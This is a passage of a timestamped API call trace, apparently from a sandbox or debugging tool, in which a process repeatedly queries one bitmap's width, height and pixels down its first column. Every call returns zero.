GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=4, color=0x18e3d0) returned 0x0 [0274.152] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.153] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.153] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=5, color=0x18e3d0) returned 0x0 [0274.153] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.153] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.153] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=6, color=0x18e3d0) returned 0x0 [0274.153] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.153] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.153] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=7, color=0x18e3d0) returned 0x0 [0274.153] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.153] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.153] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=8, color=0x18e3d0) returned 0x0 [0274.153] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.153] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.153] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=9, color=0x18e3d0) returned 0x0 [0274.154] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.154] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.154] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=10, color=0x18e3d0) returned 0x0 [0274.154] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.154] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.154] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=11, color=0x18e3d0) returned 0x0 [0274.154] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.154] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.154] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=12, color=0x18e3d0) returned 0x0 [0274.154] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.154] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.154] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=13, color=0x18e3d0) returned 0x0 [0274.154] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.155] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.155] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=14, color=0x18e3d0) returned 0x0 [0274.155] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.155] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.155] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=15, color=0x18e3d0) returned 0x0 [0274.155] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.155] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.155] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=16, color=0x18e3d0) returned 0x0 [0274.155] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.155] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.155] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=17, color=0x18e3d0) returned 0x0 [0274.155] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.155] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.156] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=18, color=0x18e3d0) returned 0x0 [0274.156] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.156] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.156] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=19, color=0x18e3d0) returned 0x0 [0274.156] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.156] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.156] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=20, color=0x18e3d0) returned 0x0 [0274.156] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.156] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.156] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=21, color=0x18e3d0) returned 0x0 [0274.156] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.156] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.156] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=22, color=0x18e3d0) returned 0x0 [0274.156] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.156] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.157] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=23, color=0x18e3d0) returned 0x0 [0274.157] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.157] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.157] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=24, color=0x18e3d0) returned 0x0 [0274.157] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.157] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.157] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=25, color=0x18e3d0) returned 0x0 [0274.157] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.157] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.157] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=26, color=0x18e3d0) returned 0x0 [0274.157] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.157] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.158] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=27, color=0x18e3d0) returned 0x0 [0274.158] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.158] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.158] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=28, color=0x18e3d0) returned 0x0 [0274.158] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.158] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.158] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=29, color=0x18e3d0) returned 0x0 [0274.158] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.158] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.158] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=30, color=0x18e3d0) returned 0x0 [0274.158] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.158] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.158] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=31, color=0x18e3d0) returned 0x0 [0274.159] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.159] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.159] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=32, color=0x18e3d0) returned 0x0 [0274.160] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.160] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.160] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=33, color=0x18e3d0) returned 0x0 [0274.160] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.160] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.160] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=34, color=0x18e3d0) returned 0x0 [0274.160] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.160] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.160] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=35, color=0x18e3d0) returned 0x0 [0274.160] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.160] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.160] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=36, color=0x18e3d0) returned 0x0 [0274.161] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.161] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.161] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=37, color=0x18e3d0) returned 0x0 [0274.161] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.161] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.161] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=38, color=0x18e3d0) returned 0x0 [0274.161] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.161] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.161] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=39, color=0x18e3d0) returned 0x0 [0274.161] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.161] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.161] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=40, color=0x18e3d0) returned 0x0 [0274.162] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.162] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.162] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=41, color=0x18e3d0) returned 0x0 [0274.162] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.162] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.162] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=42, color=0x18e3d0) returned 0x0 [0274.162] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.162] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.162] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=43, color=0x18e3d0) returned 0x0 [0274.162] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.162] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.162] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=44, color=0x18e3d0) returned 0x0 [0274.163] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.163] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.163] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=45, color=0x18e3d0) returned 0x0 [0274.163] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.163] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.163] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=46, color=0x18e3d0) returned 0x0 [0274.163] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.163] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.163] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=47, color=0x18e3d0) returned 0x0 [0274.163] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.163] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.163] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=48, color=0x18e3d0) returned 0x0 [0274.164] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.164] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.164] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=49, color=0x18e3d0) returned 0x0 [0274.164] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.164] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.164] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=50, color=0x18e3d0) returned 0x0 [0274.164] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.164] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.164] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=51, color=0x18e3d0) returned 0x0 [0274.164] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.164] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.164] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=52, color=0x18e3d0) returned 0x0 [0274.164] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.164] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.165] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=53, color=0x18e3d0) returned 0x0 [0274.165] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.165] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.165] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=54, color=0x18e3d0) returned 0x0 [0274.165] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.165] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.165] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=55, color=0x18e3d0) returned 0x0 [0274.165] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.165] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.165] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=56, color=0x18e3d0) returned 0x0 [0274.165] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.165] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.165] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=57, color=0x18e3d0) returned 0x0 [0274.165] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.166] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.166] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=58, color=0x18e3d0) returned 0x0 [0274.166] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.166] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.166] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=59, color=0x18e3d0) returned 0x0 [0274.166] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.166] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.166] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=60, color=0x18e3d0) returned 0x0 [0274.166] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.166] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.166] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=61, color=0x18e3d0) returned 0x0 [0274.166] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.166] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.166] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=62, color=0x18e3d0) returned 0x0 [0274.167] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.167] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.167] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=63, color=0x18e3d0) returned 0x0 [0274.167] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.167] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.167] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=64, color=0x18e3d0) returned 0x0 [0274.167] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.167] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.167] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=65, color=0x18e3d0) returned 0x0 [0274.167] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.167] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.167] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=66, color=0x18e3d0) returned 0x0 [0274.167] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.167] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.167] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=67, color=0x18e3d0) returned 0x0 [0274.167] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.168] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.168] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=68, color=0x18e3d0) returned 0x0 [0274.168] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.168] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.168] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=69, color=0x18e3d0) returned 0x0 [0274.168] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.168] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.168] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=70, color=0x18e3d0) returned 0x0 [0274.168] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.168] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.168] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=71, color=0x18e3d0) returned 0x0 [0274.168] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.168] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.168] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=72, color=0x18e3d0) returned 0x0 [0274.168] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.169] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.169] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=73, color=0x18e3d0) returned 0x0 [0274.169] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.169] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.169] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=74, color=0x18e3d0) returned 0x0 [0274.169] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.169] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.169] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=75, color=0x18e3d0) returned 0x0 [0274.169] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.169] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.169] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=76, color=0x18e3d0) returned 0x0 [0274.169] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.169] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.169] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=77, color=0x18e3d0) returned 0x0 [0274.170] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.170] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.170] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=78, color=0x18e3d0) returned 0x0 [0274.170] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.170] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.170] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=79, color=0x18e3d0) returned 0x0 [0274.170] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.170] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.170] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=80, color=0x18e3d0) returned 0x0 [0274.170] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.170] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.170] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=81, color=0x18e3d0) returned 0x0 [0274.170] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.170] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.170] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=82, color=0x18e3d0) returned 0x0 [0274.171] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.171] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.171] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=83, color=0x18e3d0) returned 0x0 [0274.171] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.171] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.171] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=84, color=0x18e3d0) returned 0x0 [0274.171] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.171] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.171] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=85, color=0x18e3d0) returned 0x0 [0274.171] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.171] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.171] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=86, color=0x18e3d0) returned 0x0 [0274.171] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.171] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.171] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=87, color=0x18e3d0) returned 0x0 [0274.171] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.171] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.172] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=88, color=0x18e3d0) returned 0x0 [0274.172] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.172] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.172] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=89, color=0x18e3d0) returned 0x0 [0274.172] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.172] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.172] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=90, color=0x18e3d0) returned 0x0 [0274.172] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.172] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.172] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=91, color=0x18e3d0) returned 0x0 [0274.172] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.172] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.172] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=92, color=0x18e3d0) returned 0x0 [0274.172] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.172] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.172] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=93, color=0x18e3d0) returned 0x0 [0274.172] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.173] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.173] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=94, color=0x18e3d0) returned 0x0 [0274.173] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.173] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.173] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=95, color=0x18e3d0) returned 0x0 [0274.173] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.173] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.173] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=96, color=0x18e3d0) returned 0x0 [0274.173] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.173] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.173] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=97, color=0x18e3d0) returned 0x0 [0274.173] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.173] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.173] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=98, color=0x18e3d0) returned 0x0 [0274.173] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.173] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.173] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=99, color=0x18e3d0) returned 0x0 [0274.173] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.174] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.174] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=100, color=0x18e3d0) returned 0x0 [0274.174] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.174] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.174] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=101, color=0x18e3d0) returned 0x0 [0274.174] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.174] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.174] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=102, color=0x18e3d0) returned 0x0 [0274.174] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.174] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.174] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=103, color=0x18e3d0) returned 0x0 [0274.174] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.310] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.310] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=104, color=0x18e3d0) returned 0x0 [0274.310] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.310] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.310] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=105, color=0x18e3d0) returned 0x0 [0274.310] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.310] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.310] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=106, color=0x18e3d0) returned 0x0 [0274.310] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.310] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.310] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=107, color=0x18e3d0) returned 0x0 [0274.310] 